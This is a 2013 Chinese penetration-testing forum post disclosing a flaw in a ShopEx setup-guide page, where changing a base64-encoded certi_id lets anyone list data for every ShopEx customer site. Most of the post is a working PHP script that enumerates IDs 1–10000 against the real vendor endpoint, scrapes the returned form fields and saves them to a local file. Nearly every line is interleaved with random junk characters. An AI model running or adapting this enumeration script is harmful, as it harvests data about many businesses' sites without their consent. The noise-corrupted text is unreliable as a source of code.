中国网络渗透测试联盟

标题: ShopEx某接口缺陷可遍历所有用户网站 [打印本页]

作者: admin    时间: 2013-9-21 15:59
标题: ShopEx某接口缺陷可遍历所有用户网站
简要描述:
% h  G  @' L* m1 l3 q/ UShopEx某接口缺陷,可遍历所有网站
7 N+ c. z, G% o& _# I+ P! q& o; |详细说明:" V( m) i: P9 v3 W" ^# j+ H
问题出现在shopex 网店使用向导页面 # ^: k, U8 {) l& F1 t7 J% E
' X& c0 p0 S2 d( ^; O1 W

/ _2 G' A7 a$ c+ r$ Q% \1 z  U2 @% p' ?3 ^0 h7 q
http://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=
4 o( Y( ]( g9 `/ _0 I0 b- G2 {, @  `
- J( v% |4 ?9 \  |9 L4 d5 G! ~

- M" Z2 }7 R8 A& T/ prefer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}
8 g5 a4 R& |- w6 U. Y0 `5 n5 O& `5 ]& k) _$ B: Q% T3 H( `, @% Q

' b# i3 p+ o" W8 L9 ^$ z7 h2 u" O0 v- h
我们修改certi_id 即可遍历所有使用了ShopEx程序的网站
. M  I8 ^& s6 r+ N  C) J4 t$ Q! [5 }" {6 V" W2 L4 Y# j) L

( n, L4 [; j' ~9 a8 u8 p2 `  r, w
+ I* L# X0 h9 |<?php
' H5 j$ ~  V* z' H8 }* s! S
, t( I1 ?4 B" g9 t- O                for ($i=1; $i < 10000; $i++) { //遍历
9 O/ T- ?9 T6 l( r4 F
$ Q! K% w: h% o1 m0 G0 I1 L, U  M* n                        ShowshopExD($i);
% y4 J8 k5 j' O3 D3 y5 n; c: N' t! q' c
                }
/ V9 o# e- T& `( X( g" |8 G% {0 M2 C' z* m% i5 N6 h
                function ShowshopExD($cid) {2 |9 r, }/ [! ]5 N* ^: G
/ J  }; s8 A" f9 L/ j: J  }
                $url='http://guide.ecos.shopex.cn/step2.php';
: [5 _1 z# S. e0 a  Y$ D
& [3 G. ~) ]$ i2 L' j                $refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');2 ^4 T  s  q6 g
4 }; R+ y9 m- S( c
        $url = $url.'?refer='.$refer;
4 y8 l: x" ?" L
* x! ?7 n6 H' d4 m4 E        $ch = curl_init($url);9 S' U+ M) D5 v$ e4 t5 E0 T( V) M: B) |

1 C. w( U, {  ^4 C; ^4 {. `        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;/ p& I, E; J: e$ A) U! d/ ~
" F' L4 {4 }( H& b- b
        curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;6 P9 o9 K7 F9 v: c$ F; _- @

! b, |8 B, R2 w1 O- V/ H        $result = curl_exec($ch);
5 w; i7 q- H: P( ^; A- c/ G
+ U- |. X% t4 n5 b2 m5 r' q        $result = mb_convert_encoding($result, "gb2312", "UTF-8");
3 S/ @% Q4 g1 U" P; A' f+ _& b( Z" _# x  t/ f* W/ P  R
        if(strpos($result,$refer))
! S3 @, f" `& v, l, P7 i8 u$ ?6 W
        {" }" L& y3 `) {8 w0 p' Q9 t7 k- R

# d; k. `. E/ t! O                $fp = fopen("c:/shopEx.txt",'ab'); //保存文件# v% |6 \( B- H  D' ^# K

" \' U4 `5 s) r( j                        preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);' E! P( S) n3 C! K3 N  {' N6 D

5 F- |6 t* I3 `; y9 y                foreach ($value[1] as $key) {0 a0 N# U* \$ }9 }7 D
) I0 d7 U- j% x
                        preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);) b  i& e" n2 v" V, G& i

9 @5 U9 y& z0 A! v5 i                        echo $res[1][0].':'.$res[3][0]."\r\n";" k0 u/ n, l, Z; v

$ ?9 S& J/ ~/ d                        $col =$res[1][0].':'.$res[3][0]."\r\n"; 4 W! a8 I" g3 _( |7 Y1 c  O5 J
+ k2 V* N+ Z0 ~  d$ n
                        fwrite($fp, $col, strlen($col)); 9 F8 ^. G# ~: y

( T6 ]7 F( P, `1 Q5 o4 w                }
5 [) Y4 ]! N/ w- _$ O
) _+ P! \9 r! ^9 s9 Y( b, |                echo '--------------------------------'."\r\n";2 S$ F# z4 O4 P4 a" u
- i* A) Y! s$ t4 M
                fclose($fp);
: [$ a$ \( q  Z, t+ k% F; T5 P/ Q% c9 N3 n
        }/ y2 E9 q* P) r. e0 @
! n* d; Y  K1 `6 V4 E1 B
        flush();  d( y" }- l" O6 _+ p- ~9 t
& Z. {/ Q- O& Q
        curl_close($ch);; ~. U0 h" ^" T& l- u% J: b

: x; ]1 N7 C4 B; X; E- X) F. f3 x5 W                }
$ g" i. i0 \( Z; j( j# {; c8 Y# L: {9 H( z' n4 @1 @% U
?>+ J( B0 P. p- m& l/ |
漏洞证明:
* K* T+ E8 t0 D/ _7 g# y6 Uhttp://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg
& }/ ]- b7 o1 u; ^: Qrefer换成其他加密方式! n; g/ W% x2 A6 y" Q/ t/ @' l





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2